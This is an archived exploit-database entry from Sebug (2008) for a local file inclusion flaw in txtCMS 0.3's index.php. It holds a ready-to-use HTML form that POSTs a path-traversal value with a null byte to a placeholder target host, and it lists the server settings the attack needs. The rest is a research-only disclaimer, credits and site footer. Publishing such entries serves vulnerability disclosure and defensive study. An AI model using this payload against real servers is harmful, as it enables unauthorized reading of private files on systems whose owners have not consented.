txtCMS 0.3 (index.php) Local File Inclusion Exploit
SBEUGID:SEBUGE2008053533
发布时间:2008-05-09
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<!--
Name : txtCMS 0.3 (index.php) Local File Inclusion Exploit
Author : cOndemned
Conditions : Register_globals = On / Magic_quotes_gpc = Off
Greetz : irk4z, GregStar, ZaBeaTy, ElusiveN, Avanturka :***
-->

<html>
<head>
<title>txtCMS 0.3 (index.php) Local File Inclusion Exploit</title>
</head>
<body>
<form action="http://target.host/txtcmsv0.3/index.php" method="POST">
<input type="text" name="id" value="../file%00">
<input type="submit" value="show">
</form>
</body>
</html>

# sebug.net
// Sebug.net [ 2008-05-11 ]

本信息由SEBUG翻译整理,版权所有,未经许可,不得转载

提交信息 | 本站声明 | 帮助 | 论坛 | 合作伙伴
Copyright © SEBUG Security Database 2006  All rights Reserved.
鄂ICP备05024839号